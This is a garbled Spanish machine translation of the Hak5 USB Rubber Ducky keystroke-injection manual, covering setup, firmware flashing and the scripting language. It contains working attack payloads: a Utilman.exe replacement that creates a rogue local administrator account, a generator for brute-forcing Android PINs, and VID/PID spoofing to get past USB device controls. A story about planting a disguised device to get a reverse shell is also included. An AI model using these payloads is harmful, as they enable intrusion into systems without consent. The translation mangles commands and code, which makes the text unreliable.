2
31
Habla de contenido Descargo de responsabilidad 4 Características de un vistazo 4 en Historia 4 Conozca su Ducky 5 Hardware 5 Ducky Guión general 5 Módulos / Firmware adicional 5 La historia de Bob 6 Conexión por primera vez 7 Generando tu primer Ducky Guión 7 Utilizando Encoder Versión 1 7 Su primer guión 7 Utilizando Encoder Versión 2.1 + 8 Su primer guión 8 Código de ejemplo Ducky 9 Ventanas Wallpaper Prank 9 Ventanas Utilman Exploit 10 Ducky In Disguise 12 Caso USB 12 De poner el caso en conjunto 12 Extracción del Caso 12 Pato de la novedad 12 Ducky y Android 13 Linux - Bash script 14 OSX - Shell Script 14 Mejoras 14 Soporte 15 Créditos 16 Gracias 16 Apéndice: Especificación 17 Atmel AT32UC3B1256 Características 17 Apéndice: Guía Intermitente - Windows 18 Instalación 18 Atmel Conductor 18 Intermitente 21 Apéndice: Intermitente Guía - Linux / OSX 22 Introducción 22 La compilación de 22
-
Upload
ferrermozzad -
Category
Documents
-
view
20 -
download
2
description
l
Transcript of 2
Habla de contenidoDescargo de responsabilidad 4Caractersticas de un vistazo 4 enHistoria 4Conozca su Ducky 5Hardware 5Ducky Guin general 5Mdulos / Firmware adicional 5La historia de Bob 6Conexin por primera vez 7Generando tu primer Ducky Guin 7Utilizando Encoder Versin 1 7Su primer guin 7Utilizando Encoder Versin 2.1 + 8Su primer guin 8Cdigo de ejemplo Ducky 9Ventanas Wallpaper Prank 9Ventanas Utilman Exploit 10Ducky In Disguise 12Caso USB 12De poner el caso en conjunto 12Extraccin del Caso 12Pato de la novedad 12Ducky y Android 13Linux - Bash script 14OSX - Shell Script 14Mejoras 14Soporte 15Crditos 16Gracias 16Apndice: Especificacin 17Atmel AT32UC3B1256 Caractersticas 17Apndice: Gua Intermitente - Windows 18Instalacin 18Atmel Conductor 18Intermitente 21Apndice: Intermitente Gua - Linux / OSX 22Introduccin 22La compilacin de 22La actualizacin del firmware 22Dump (copia de seguridad) de firmware actual 22Actualizacin 22Apndice: Definiciones de firmware 23Apndice: Trucos 25Cambie el VID y el PID de la Ducky Firmware v1 25Busque el VID y PID 25Tabla Hex 25Cambie el VID y PID 26Cambie el VID y el PID de la Ducky firmware v2 26Linux: 26Ventanas: 26Apndice: Ducky Guin API 27REM 27DEFAULT_DELAY o DEFAULTDELAY 27RETRASO 27CADENA 27WINDOWS o GUI 28MENU o APP 28SHIFT 28ALT 28CONTROL o CTRL 28Teclas de flecha 29Extended Comandos 29Apndice: Creacin de Soporte de idiomas en V2.1 Encoder Pato + 30Language Pack Lugar 30Cmo paquetes de idioma de trabajo? 30Crear Nuevo Soporte de idiomas (1) 30As que, cmo saber = ISO_8859_1_A7? 30Crear Nuevo Soporte de idiomas (2) 30Cmo descubres cdigos HID? 30Software de Windows 30Software Linux 31
Preguntas ms frecuentes (FAQ) 32
1. Insert mi Ducky en una computadora con Windows y no pasa nada? 322. Mi Ducky parpadea Rojo, y ahora qu? 323. Cuando me conecto a la Ducky, hace algo raro, y ejecuta todo en mi escritorio? 324. Soy de X pas, el Ducky dispara llaves aparentemente al azar, qu est pasando? 325. Soy de X pas. Mi idioma no est soportado el Ducky no tiene sentido. 336. Qu idiomas son compatibles actualmente? 337. DE ACUERDO. Cmo realizar la DuckEncoder.jar utilizando un mapa de teclado especfico? 338. Qu sistemas de ficheros son compatibles? 339. Creo que mi Ducky es muerto? 33
RenunciaEl Ducky (USB Rubber Ducky) es una herramienta de pruebas de penetracin USB para su uso en las auditoras de seguridad autorizados cuando lo permita. Revise las leyes y obtener permiso antes de usar. Hak5, LLC y sus afiliadas afirman ninguna responsabilidad por el uso no autorizado o daos. Por favor hackear responsablemente.Caractersticas de un vistazo
Sencillo lenguaje de scripts Plataforma Cruz -Tipo HID de ataque ms rpido que un humano Software de control de dispositivos de derivacin fuerza bruta Iniciar sesin InterfacesFigura 1: El Rubber Ducky USB
Historia
Tras el xito de la Switchblade USB, la plataforma de ataque que era super efectivo contra objetivos locales de Windows, la comunidad Hak5 ha desarrollado un nuevo tipo de ataque - esta plataforma cruzada tiempo (Windows, Mac, Linux) - que logra resultados mortales hacindose pasar por un teclado ubicua.El Rubber Ducky USB no es su HID ordinario (Human Interface Device). Junto con un potente procesador de 60 MHz de 32 bits y un simple lenguaje de scripting que nadie es capaz de elaborar cargas tiles capaces de cambiar la configuracin del sistema, la apertura de las puertas traseras, recuperacin de datos, iniciando conchas inversa, o bsicamente cualquier cosa que se puede lograr con el acceso fsico - todo automatizado y ejecutado en cuestin de segundos.
Multiplataforma: Ataques cualquier sistema operativo que soporta teclados USB. Lenguaje de scripting simple: Comience a escribir cargas tiles en minutos. Open Firmware Fuente: Agregar funcionalidad utilizando libreras incluidas. Almacenamiento ampliable: tarjetas Micro SD hacen posible llevar a mltiples cargas. Apoyo a la Comunidad: Acciones scripts de ejemplo, cargas tiles completos y obtener ayuda en lnea.Conozca su DuckyHardware AVR 32bit Micro-Controllero AT32UC3B1256o 256Kbytes almacenamiento interno de Flasho de alta velocidad USB 2.0 BUS Lector de tarjetas Micro SD Push Button Micro El indicador LED multicolor Conector USB estndar "Tipo A"Especificacin completa se puede encontrar en el Apndice:
Especificaciones.
Ducky Guin general
Ducky Script es el lenguaje del USB Rubber Ducky. Escribir guiones para que se puede hacer desde cualquier editor de texto ASCII comn, como el Bloc de notas, vi, emacs, nano, gedit, kedit, TextEdit, etc.Sintaxis Ducky Script es simple. Cada comando reside en una nueva lnea y puede tener opciones de seguir. Los comandos se escriben en maysculas, porque los patos son fuertes y les gusta graznar con orgullo. La mayora de los comandos invocan las pulsaciones de teclado, clave combos o cadenas de texto, mientras que algunos retrasos oferta o pausas.A diferencia de la Teensy, donde el conocimiento de conocimientos de programacin basado en C y basado en Arduino es una necesidad. Ducky Guin pretende ser un lenguaje de alto nivel que cualquier persona de cualquier nivel de habilidad o edad puede aprender rpidamente.Mdulos / Firmware adicional
La comunidad ha ayudado a construir una funcionalidad adicional Ducky mediante la publicacin de firmware:
Soporte Multi Sistema Operativo Almacenamiento masivo Mltiple de carga til de entrega Dispositivo compuesto (Almacenamiento y HID Misa Emulacin Teclado)Ms detalles sobre el firmware retrospectiva, su uso y limitaciones se pueden encontrar en el Apndice: Definiciones de firmware.La historia de Bob
Bob es un Penetration Tester Profesional de la especialidad de la empresa X. Bob est compromisos de ingeniera social. Compaa ACME-Financiera, ha contratado a la empresa X (Bobs empleador) para realizar algunas pruebas de intrusin anual para asegurar que todos sus clientes informacin financiera es segura, y no puede ser hackeado por una tercera parte (espionaje industrial). La evaluacin implica probar la infraestructura y la aplicacin estndar, pero ACME-financiera son, adems, preocupado por la ingeniera social (SE); podra alguien simplemente entrar en el edificio y empezar a atacarlos desde su propio sistema.
Bob, al ser un ingeniero social experimentado tena las siguientes opciones iniciales:
Camine por la puerta delantera SE la recepcionista, sentarse en un escritorio vaco y empezar a cortar. portn trasero un empleado de regresar al trabajo despus de un descanso de humo, sentarse en un escritorio vaco y empezar a cortar. Cada de una unidad USB (navaja) en el aparcamiento / comunal de la zona / los fumadores-zona, espero que alguien se da cuenta de la unidad, lo recoge y lo inserta en la mquina en su escritorio. El USB se inicia un revs-shell para un servidor controla Bob, Bob puede comenzar hacking.Bob habl con sus compaeros de equipo acerca de la infraestructura interna de ACME-financiera, y las polticas de seguridad en el lugar. Bob se entera de que:
Barreras contra el portn trasero estn en uso. Para iniciar sesin en una estacin de trabajo necesita una tarjeta inteligente vlida (autenticacin de dos factores). Las estaciones de trabajo estn bloqueados, slo para arrancar Windows XP. Las estaciones de trabajo estn completamente parcheado. Las estaciones de trabajo tienen antivirus instalado y las actualizaciones recientes se han aplicado.
Planes de Bob parecen estar frustrado.
Bob record que recientemente haba visto una Rubber Ducky USB demo en ToorCon; un pequeo dispositivo USB que podra emular un teclado. Bob comenz a pensar en la confianza inherente entre un ordenador y sus perifricos. Bob nunca haba llegado a travs de un equipo que se neg a utilizar un teclado recin insertar.As que Bob orden un USB Ducky de goma y un caso, y comenz a experimentar con emulacin HID, y Scripts Ducky.Bob hizo una carga inversa-shell, y se inserta el Ducky en su caso, el Ducky ahora se pareca a una unidad USB llanura; que tras la insercin comenzara rpidamente a escribir en el teclado y crear efectivamente una reversa-shell al servidor de Bob en el Internet. Bob pegado una pegatina en el USB con la etiqueta "2012 Top Informacin de la cuenta" y lo dej caer en el rea de los fumadores, esperando que alguien descubrirlo, recogerlo, y tratar de leer la unidad USB en su mquina.Bob esper pacientemente en su coche, usando su mdem 4G para acceder a Internet. Bob se sent en silencio, esperando a que el ping de un revs con cscara. Entonces auge, Bob tena acceso a la red local! Alguien haba insertado Ducky de Bob en su ordenador.
Conexin por primera vez
El Ducky est precargado con la fbrica por defecto emulacin HID firmware. Al insertar el Ducky en un sistema operativo Windows, el Ducky debe abrir un cuadro de ejecucin, y llevar al usuario a http://www.hak5.org/.Generando tu primer Ducky Guin
Utilizando Encoder Versin 1
Encoder versin 1 se incluye en la tarjeta SD suministrada. Sin embargo, se limita a la asignacin de teclado de Estados Unidos. Si usted es de cualquier otro pas, no se preocupe! Hay una versin 2.1+ que soporta varios idiomas ms, y posiblemente ms con su ayuda! Si usted es de fuera de los EE.UU., dirjase por favor a Utilizando V2.1 + Encoder.
Su primer guin
Abre el bloc de notas (o cualquier otro editor) y probar el ejemplo simple continuacin como su primer guin:
REM Aadir demora para garantizar de Windows puede agregar controlador apropiadoGUI-RNotepad CADENAENTRARRETRASO 500CADENA Esta es mi primera Ducky GuinENTRARGuarde el archivo como example_1.txt
Ahora retire la tarjeta SD de la Ducky. Puede ser un poco dura al principio, as no se preocupe si parece estar atascado.Utilice un adaptador de tarjeta SD (enlace a la tienda Hak5), o utilizar cualquier otro adaptador (tarjeta de la cmara), o incluso un puerto nativo en su PC / ordenador porttil.Ahora desde un shell / rpido, moverse en el mismo directorio que duckencoder.jar (Por lo general E: /)La sintaxis para v1 duckencoder es:java -jar duckencoder -i -o Ejemplo:e cd: /java -jar duckencoder.jar -i example_1.txt -o inject.binAhora expulsar la tarjeta SD, y la inserta en el Ducky. Asegrese de que la tarjeta SD est al ras con el extremo de la junta directiva de la Ducky.Inserte el Ducky en su sistema operativo Windows. Usted debe ver la libreta abierta Ducky y escriba nuestro sencillo mensaje.Utilizando Encoder Versin 2.1 +
Descargar: http://code.google.com/p/ducky-decode/
Despus de descubrir la debilidad de la primera versin pblica de la Ducky, pronto se vio que el Ducky no trabajar para otros pases / idiomas. Se descubri que algunas lenguas se movan alrededor de teclas (por ejemplo, Ingls - QWERTY, Alemn - QWERTZ), y otras lenguas aadi teclas adicionales (por ejemplo, el teclado del Reino Unido tiene \, , etc.). Crdito inicial que aqu va a Midnitesnake para la Prueba de concepto inicial (PoC) probando el soporte de idiomas se encuentran dentro del codificador y no el firmware. Recientes crdito va a Dnucna para mejorar PoC de Midnitesnake y produciendo el Encoder Pato V2.1 +, que utiliza un archivo de propiedades para definir lo que las pulsaciones de teclado generar un carcter particular (dentro de un formato ASCII dado, ISO, UTF, etc.).Su primer guinAbre el bloc de notas (o cualquier otro editor) y probar el ejemplo simple continuacin como su primer guin:REM Aadir demora para garantizar de Windows puede agregar controlador apropiadoRETRASO 5000GUI-RNotepad CADENAENTRARRETRASO 500CADENA Esta es mi primera Ducky GuinENTRARGuarde el archivo como example_1.txtAhora retire la tarjeta SD de la Ducky. Puede ser un poco dura al principio, as no se preocupe si parece estar atascado.Utilice un adaptador de tarjeta SD (enlace a la tienda Hak5), o utilizar cualquier otro adaptador (tarjeta de la cmara), o incluso un puerto nativo en su PC / ordenador porttil.
Ahora desde un shell / rpido, moverse en el mismo directorio que duckencoder.jar (Por lo general E: /).
La sintaxis para duckencoder v2.1 + es:java -jar duckencoder -l -I -o
Ejemplo (Windows):e cd: /java -jar duckencoder.jar recursos -l \ uk.properties -i example_1.txt -o inject.binAhora expulsar la tarjeta SD, y la inserta en el Ducky. Asegrese de que la tarjeta SD est al ras con el extremo de la junta directiva de la Ducky.Inserte el Ducky en su sistema operativo Windows. Usted debe ver la libreta abierta Ducky y escriba nuestro sencillo mensaje.
Cdigo de ejemplo DuckyUna coleccin de cargas tiles se puede encontrar aqu:
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/PayloadsVentanas Wallpaper Prank Autor: Darren Cocina Duckencoder: 1.0 Objetivo: Windows 7 Descripcin: Minimiza todas las ventanas al escritorio, toma la captura de pantalla, desactiva los iconos del escritorio, salva pantalla en% userprofile% y establece como fondo de pantalla
RETRASO 5000GUI dRETRASO 500PRINTSCREENRETRASO 100MENRETRASO 300CADENA VRETRASO 40CADENA DRETRASO 300GUI rRETRASO 700Mspaint CADENAENTRARRETRASO 1200CTRL vRETRASO 500CTRL sRETRASO 1000CADENA% USERPROFILE% \ .bmpENTRARRETRASO 500ALT fRETRASO 400CADENA KRETRASO 100CADENA FRETRASO 1000ALT F4RETRASO 300GUI dVentanas Utilman Exploit
Autor: Xcellerator (! Apoyos a Tenedor guin Bomba de Jay Kruer para la tcnica de bypass UAC) Duckencoder: 1.0 Objetivo: Windows 7 Descripcin: Usa el Utilman.exe Exploit para crear una nueva cuenta de administrador local "Local000" con el "Hak5" contrasea.
REM Autor: XcelleratorREM Descripcin: Utilman Explotador para crear una nueva cuenta de administradorREM La nueva cuenta se llama "Local000".RETRASO 5000GUIRETRASO 50Cmd STRINGMENCADENA unENTRARIZQUIERDAENTRARRETRASO 200CADENA takeown / f "% systemroot% \ System32 \ Utilman.exe"ENTRARRETRASO 50CADENA Icacls "% systemroot% \ System32 \ Utilman.exe" administradores / subvencin: F / TENTRARRETRASO 50CADENA cd% systemroot% \ System32ENTRARRETRASO 50Util mkdir CADENAENTRARCADENA xcopy cmd.exe util \ENTRARRETRASO 50Ren STRING Utilman.exe Utilman.exe.bakENTRARUtil STRING cdENTRARRETRASO 50Ren STRING cmd.exe Utilman.exeENTRARRETRASO 50Cd STRING ..ENTRARRETRASO 50CADENA xcopy util / Utilman.exe \ENTRARRETRASO 50Rmdir CADENA / s / q utilENTRARRETRASO 50Salida CADENAENTRARRETRASO 50GUI uCADENA net user Local000 / addENTRARRETRASO 50
Administradores STRING localgroup neta Local000 / addENTRARRETRASO 50Salida CADENAENTRARRETRASO 50GUI rCmd STRINGENTRARRETRASO 50CADENA cd "% systemroot% \ System32"ENTRARRETRASO 50CADENA eliminar Utilman.exeENTRARRETRASO 50STRING yENTRARRETRASO 50Ren STRING Utilman.exe.bak Utilman.exeENTRARRETRASO 50Salida CADENAENTRARGUICmd STRINGMENCADENA unENTRARRETRASO 50IZQUIERDAENTRARRETRASO 200CADENA Local000 net user *ENTRARHak5 CADENAENTRARHak5 CADENAENTRARSalida CADENAENTRAR
Ducky In DisguiseCaso USBPara hacer el patito ms eficaz y duradera durante los compromisos, la Ducky ahora viene con un estuche USB. La carcasa est moldeada especficamente a la junta directiva de la Ducky por un agradable, en forma convincente ceido.Figura 2: El Caso Ducky
Figura 3: Novelty Rubber Ducky
De poner el caso en conjuntoEl Ducky deber insertarse fcilmente en la base, entonces usted puede fcilmente en la cubierta superior y la cubierta metlica opcional; por lo que se ve como un dispositivo USB normales / promocional. Ver Figura 2: El Caso Ducky.Extraccin del CasoEl caso negro tiene un pequeo agujero en la parte posterior (opuesto de la Una interfaz USB). Simplemente inserte un alfiler o clip para separar las dos partes moldeadas negras, para recuperar el desnudo Ducky.Pato de la novedadUsted tambin debera haber recibido un pato de goma novedad (uno de muchos colores surtidos). Para hacer su Ducky parezca un dispositivo USB de la novedad. Su "novedad" Ducky necesita un poco de ciruga.Advertencia: Cuchillos estn afilados, cuidado!Simplemente corte una pequea incisin lateral en el trasero de la Ducky, luego apriete el culo de la Ducky y suavemente inserte el (Tarjeta electrnica) Ducky. A continuacin, debe tener algo parecido a la Figura 3: Novelty Ducky de goma.
Ducky y AndroidDarren descubri que un Ducky se podra utilizar para un ataque de fuerza bruta Pin Android. Hasta el momento ha funcionado a la perfeccin en un Galaxy Nexus / Nota ejecutando la ltima Android 4.2.1.Figura 4: Son Droids miedo de Patos elctricos?Para este ataque funcione se necesita un USB (micro) On-The-Go cable (OTG) como el que se muestra a continuacin:Figura 5: Un cable USB OTGCon un PIN de 4 dgitos y el valor por defecto de 5 intentos, seguido de un segundo tiempo de espera de 30 usted est buscando en el mejor de los caso de agotar el espacio clave en alrededor de 16,6 horas. Afortunadamente el USB Rubber Ducky nunca se cansa, aburrido o tiene que hacer pis.En lugar de publicar los casi 600K Ducky Guin continuacin es el script bash utilizado para crearlo. Usted podra modificarlo para hacer 5 dgitos, pero que tomara 166 horas. 10 dgitos tomaran 1902,2 aos.Linux - Bash scripteco RETRASO 5000> android_brute-force_0000-9999.txt; {echo 0000..9999} | xargs -n 1 echo STRING | sed '0 ~ 5 s / $ / \ nWAIT / g' | sed '0 ~ 1 s / $ / \ nDELAY 1000 \ NIntroduzca \ NIntroduzca / g' | >> android_brute-force_0000-9999.txt sed '/ ESPERA / DELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca / g s'OSX - Shell Scripteco RETRASO 5000> android_brute-force_0000-9999.txt; {echo 0000..9999} | xargs -n 1 echo STRING | GSED '0 ~ 5 s / $ / \ nWAIT / g' | GSED '0 ~ 1 s / $ / \ nDELAY 1000 \ NIntroduzca \ NIntroduzca / g' | >> android_brute-force_0000-9999.txt GSED '/ ESPERA / DELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca \ nDELAY 5000 \ NIntroduzca / g s'MejorasEs posible que desee modificar el script Ducky para tratar los 10 pernos de telfono ms comunes, antes de que los intentos de fuerza bruta: 1234 1111 0000 1212 7777 1004 2000 4444 2222 6969
ApoyoLas actualizaciones de software, segmentos relacionados de la feria Hak5, artculos de blog Hak5 y los foros USB Rubber Ducky estn vinculados desde el sitio usbrubberducky.com. Las preocupaciones sobre los pedidos pueden dirigirse a [email protected] 6: USB Foro Rubber Ducky
Al publicar preguntas al foro USB Ducky de goma, por favor indique: Ducky versin de hardware Nombre Ducky Firmware Version / Cdigo Su Pas / Idioma Su sistema operativo Su sistema operativo de destino Su Ducky Guin Cualquier mensaje de error o de archivo de registro de informacinCrditosEl Rubber Ducky USB es trado a usted por el Quack-Team:Darren CocinaJason ApplebaumMidnitesnakeDnucnaApacheTechConsultancyUna increble comunidad - usbrubberducky.comhttp://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/Software de cdigo abierto se distribuye bajo la Licencia Pblica General GNUhttp://www.gnu.org/licenses/gpl.htmlEl firmware es bajo licencia de ATMELhttp://www.atmel.com/about/legal.asp
GraciasPara todos los que ayudaron con cargas tiles, y ayud a desarrollar nuevos mapas de teclas.Apndice: EspecificacinCaractersticas Atmel AT32UC3B1256 Alto rendimiento, energa baja AVR 32 UC Microcontrolador 32-Bit Compacto de ciclo nico del conjunto de instrucciones RISC Incluyendo DSP Instruction Set Instrucciones de lectura-modificacin-escritura y manipulacin de bits Atmica Realizacin de hasta 1,39 DMIPS / MHz Hasta 83 DMIPS Correr a 60 MHz desde Flash Hasta 46 DMIPS funcionamiento a 30 MHz desde Flash Unidad de Proteccin de la memoria Bus de sistema Multi-jerarqua High-Performance transferencias de datos en buses separados para un mayor rendimiento 7 canales perifricos DMA Mejora la velocidad para Perifrica de Comunicacin Alta velocidad interna flash 512K Bytes, 256K Bytes, 128 Kb, 64 KB Versiones Ciclo individual Acceso hasta 30 MHz Prefetch Buffer Optimizacin de ejecucin de instrucciones a la mxima velocidad Pgina 4 ms Tiempo de Programacin y 8ms completo-Chip Erase Tiempo 100.000 ciclos de escritura, de 15 aos la capacidad de retencin de datos Cerraduras de Seguridad Flash y definido por el usuario rea de configuracin Alta velocidad interna SRAM, Acceso solo para bicicletas en el Full Speed Bytes 96K (512 KB Flash), 32K Bytes (256 KB y 128 KB Flash), 16K Bytes (64KB Flash) Controlador de interrupcin Autovectored Latencia del servicio de interrupcin Low con prioridad programable Funciones del sistema Energa y Gerente Reloj Incluyendo RC interno Reloj y Uno 32KHz Oscilador
Dos Osciladores de usos mltiples y dos Fase-Lock-Loop (PLL) permitiendo independiente frecuencia de la CPU desde USB Frecuencia Temporizador de vigilancia, en tiempo real de reloj temporizador Universal Serial Bus (USB) Dispositivo 2.0 y Host Embedded de baja velocidad y de velocidad completa End-Point Configuracin flexible y Gestin con Dedicados Canales DMA Transceptores On-chip Incluyendo Pull-Ups Wake USB del sueo Funcionalidad One Three-Channel temporizador de 16 bits / Contador (TC) Tres Reloj externo Entradas, PWM, Captura y Varios Contar Capacidades Uno de 7 canales de 20 bits de ancho de pulso modulacin Controller (PWM) Tres universal sncrono / asncrono receptor / Transmisores (USART) Velocidad de transmisin independiente Generador, Apoyo a SPI, IrDA y las interfaces de ISO7816 Soporte para hardware apretn de manos, RS485 Interfaces y Modem Line Un maestro / esclavo serie Interfaces perifricos (SPI) con Chip Select Seales Una sncrono del Protocolo serie Soporta I2S y protocolos basados en fotogramas en genricos compatible I2C-400kbit / s Un maestro / esclavo de dos hilos Interface (TWI) Uno de 8 canales de 10 bits de analgico a digital, 384ks / s 16 bits de audio estreo Bitstream DAC Frecuencia de muestreo de hasta 50 kHz Apoyo QTouch Biblioteca capacitiva Touch botones, deslizadores y Ruedas QTouch y qMatriz AdquisicinApndice: Gua Intermitente - WindowsCuando se trata de la programacin del pato que necesita esos recursos para Windows: http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck%20Programming.zip.Adems es posible que tenga JRE FLIP de http://www.atmel.com/tools/FLIP.aspx y asegrese de utilizar los controladores en el Programming.zipMicrosoft Visual C ++ Redistributable: 86 - http://www.microsoft.com/en-gb/download/deails.aspx?id=5555 x64 - http://www.microsoft.com/en-gb/download/details.aspx?id=14632InstalacinEsto es muy fcil y se puede completar en 2-3 pasos:1. Instale Visual C ++ Redistributable2. Instale tirn3. Instale Atmel Conductor4. Actualice el dispositivo Atmel DFU en el Administrador de dispositivosAtmel ConductorInserte el Ducky en modo DFU (manteniendo pulsado el botn del Ducky abajo de forma continua, mientras que la insercin de la Ducky en el PC)Si Windows no se instala automticamente el controlador correcto, no se preocupe un manual de instalacin resolver el problema.Abra el Administrador de dispositivos:Windows XP: Haga clic derecho en Mi PC -> Propiedades - Perfiles> Hardware -> Administrador de dispositivosWindows Vista +: Haga clic derecho en Mi PC -> Propiedades -> Administrador de dispositivosEl dispositivo Atmel se puede encontrar bajo otros dispositivos, y debe tener un pequeo icono de advertencia amarillo - acusar problemas con los controladores. Tenemos que actualizar el controlador, logrado siguiendo los siguientes pasos:Figura 7: Administrador de dispositivos - Encuentra el dispositivo USB AtmelHaga clic en el icono "AT32UC3B DFU" y seleccione "Actualizar controlador"Figura 8: Actualice el controlador AtmelManualmente Buscar / Especifique el conductor LugarFigura 9: Instalacin manual de Atmel ConductorInstale el controlador de Windows Lib-USB:Figura 10: Instalacin de Lib-USB DriverInstalacin del controlador completo:Figura 11: Instalacin del controlador Atmel completa
IntermitentePrimero inserte el patito manteniendo continuamente presionado el pequeo botn negro.Esto pone el patito en modo DFU; tenemos que estar en este modo de actualizar el firmware.Es bastante sencillo, basta con ejecutar:program.bat new_firmware.hex
Apndice: Intermitente Gua - Linux / OSXIntroduccinEn el agarre lateral Unix / OSX estos scripts de shell agradable para el vertimiento existente y programar el nuevo firmware. Disponible aqu: DFU-programador-0.5.4Nota: Hay problemas reportados con versin DFU-programador 0.5.2, por favor intente la versin ms reciente en el enlace que aparece arriba.CompilacinExtraiga el paquete, configurar, hacer e instalar:tar -xzf DFU-programador-0.5.4.tgzcd DFU-programador-0.5.4./configurehacersudo make installLa actualizacin del firmwareDump (copia de seguridad) de firmware actualsudo DFU-programador volcado at32uc3b1256> dump.binNo se olvide de restablecer el Ducky:sudo reinicio at32uc3b1256 DFU-programadorActualizacinPaso 1 - borrar el patito:sudo DFU-programador at32uc3b1256 borradoPaso 2 - actualizar el firmware:sudo DFU-programador at32uc3b1256 parpadea --suppress-bootloader-mem-patito update.hexPaso 3 - No se olvide de restablecer el Ducky:sudo reinicio at32uc3b1256 DFU-programadorApndice: Definiciones de firmwarePatoDuck.hex el firmware de pato original, mejorado para trabajar en todo del sistema operativo (Win, Unix, OSX, Android, +).Grasa de patoUSB.hex convierte el Ducky en un dispositivo USB de almacenamiento masivo.Originalmente burlado, como intil; algunas personas pierden el potencial / propsito de este proyecto. Originalmente desarrollado para eludir el software de control de dispositivo que los cdigos de la lista de negro / lista blanca de dispositivos USB con sede fuera de VID y PID. A medida que el Ducky es programable, por lo-largo como VID vlida se utiliz / clase de dispositivo PID, la Ducky podra eludir el software de control del dispositivo.Este fue lanzado pblicamente cuando el apoyo Ducky pareca disminuir. Los pensamientos eran al menos la gente podra convertir su pato en una unidad USB til, en lugar de tener un proyecto fallido atrapado en un cajn (La gente se haba bifurcado originalmente fuera de $ 80 (USD) para uno de estos muchachos poco). Otros llaman Ducky propietarios Quackers.Pato Detour (anteriormente conocido como el "Pato Naked")El firmware m_duck.hex apoya-mltiples cargas tiles: inject.bin - carga por defecto (siempre que se ejecute) inject2.bin - NUM_LOCK inject3.bin - Bloq Mays inject4.bin - bloqueo de desplazamientoBsicamente, inject.bin siempre se dispara en la insercin Ducky.inject2 / 3 / 4.bin se activan, garantizando slo Num_Lock / Bloq Mays / LED Teclado Scroll_Lock 's est encendidoEsto proyecta Firmware fue apodado originalmente The Duck Desnudo / Naked Ducky Edition como Ducky tena que estar desnudo para que empuje el botn y disparar la segunda / tercera / cuarta carga til; los ltimos avances en la versin 2 del firmware deben dar lugar directamente desde el teclado.Propsito planteadoUno Ducky; apoyar 3x sistemas operativos o por etapas cargas tiles: inject.bin - archivo predeterminado (simple 1-liner "RETRASO 5000") inject2.bin - Windows XP Guin / Carga 2 inject3.bin - Windows Vista + Guin / carga til 3 inject4.bin - OSX Guin / Carga til 4Soporte Multi OSAs que en Windows Host, asegrese Num_Lock est encendido, y empuje el botn de la Ducky para entregar una carga til basado en Windows.En OSX, asegrese de Bloq Mays est encendido, y empuje el botn de la Ducky para entregar una carga til basado en OSX.Multi carga til SoportePor inject.bin predeterminada siempre se activa tras la insercin de la Ducky.Es posible que dependiendo del software instalado (por ejemplo, PowerShell) quieren desencadenar una de las dos cargas tiles diferentes. Windows 7 + - Uso Num_Lock para inject2.bin para utilizar PowerShell Windows XP - Utilizacin Bloq Mays para inject3.bin para utilizar otros binarios de Windows (por ejemplo, TFTP para descargar cargas tiles)Doble Duck c_duck_v2.hex - Duck Composite, en varios idiomas.Este fue otro importante objetivo del proyecto. Creado un trabajo de prueba de concepto justo a tiempo para el aniversario de 1 ao! Inyeccin de HID y de almacenamiento masivo apoyan todo dentro de un dispositivo.Apodado El Pato gemelo ya que funciona como dos separados Ducky de.Apndice: TrucosCambie el VID y el PID de la v1 Ducky FirmwareEn lugar de volver a compilar el firmware para cambiar el VID y el PID de la Ducky.Slo tiene que utilizar un editor hexadecimal / o un simple comando sed - para cambiar el VID y PID!Y simplemente re-flashear el firmware.Advertencia: Es necesario tener el VID y PID dentro de la misma clase de dispositivo. Por ejemplo, para el modo de teclado HID, impulsin del USB, para el modo de almacenamiento.Si le das a la Ducky un VID y PID completamente diferente (o aleatorio), como una cmara / digital webcam - el sistema operativo se carga el controlador errneo y el Ducky no funcionar!Busque el VID y PIDEl VID y PID predeterminado es 03EB (VID) 2403 (PID)Debido a la Endian-ess del archivo hexadecimal tenemos que buscar EB030324reverse (03EB) + marcha atrs (2403) = (EB03) (0324) = EB030324hexdump -C usb.hex | grep "EB030324"00010700 34 30 45 42 30 33 30 33 32 34 36 38 0d 0a 3a 31 | 40EB03032468 ..: 1 |Hex TablaPara entender la relacin entre hexadecimal y decimal, por favor consulte la tabla en el siguiente enlace:Figura 12: Tabla ASCIICambie el VID y PIDAhora en Linux, podemos cambiar fcilmente el PID para 2503. (o 0325 despus de ser convertido a hex = \ x30 \ x33 \ x32 \ x35 a travs de sedEl siguiente comando se usa para cambiar el VID y PID, usb.hex se deja en su (copia de seguridad) usb1.hex estado predeterminado contendr nuestro nuevo firmware con el VID / PID cambi:sed 's / \ x45 \ x42 \ x30 \ x33 \ x30 \ x33 \ x32 \ x34 / \ x45 \ x42 \ x30 \ x33 \ x30 \ x33 \ x32 \ x35 / g' usb1.hexAhora para comprobar usb1.hex, por el VID / PID (03EB 2503):hexdump -C usb1.hex | grep "EB030325"00010700 34 30 45 42 30 33 30 33 32 35 36 38 0d 0a 3a 31 | 40EB03032568 ..: 1 |
Cambie el VID y el PID de la v2 Ducky FirmwareEn lugar de extraer, modificar el VID y PID con un editor hexadecimal y la molestia de volver a parpadear el pato. La versin 2 de todo el firmware tiene un truco muy til. Leer el VID y el PID de un archivo binario.Slo tiene que utilizar un editor hexadecimal para crear un archivo llamado vidpid.bin en la raz de la sdcard. Los primeros 2bytes representan la VID. La segunda 2bytes representan el PID.Linux:
$ Hexedit /media/DUCKY/vidpid.bin...00000000 03 EB 03 25 ...%00000014Advertencia: El VID y PID tiene que coincidir con la clase del dispositivo, por ejemplo un firmware compuesto no funcionar con el VID y el PID de un teclado, necesita un dispositivo compuesto a juego VID y PID.No podra ser ms sencillo.Ventanas:Utilice un editor hexadecimal libre como: http://mh-nexus.de/en/hxd/ http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm http://www.wxhexeditor.org
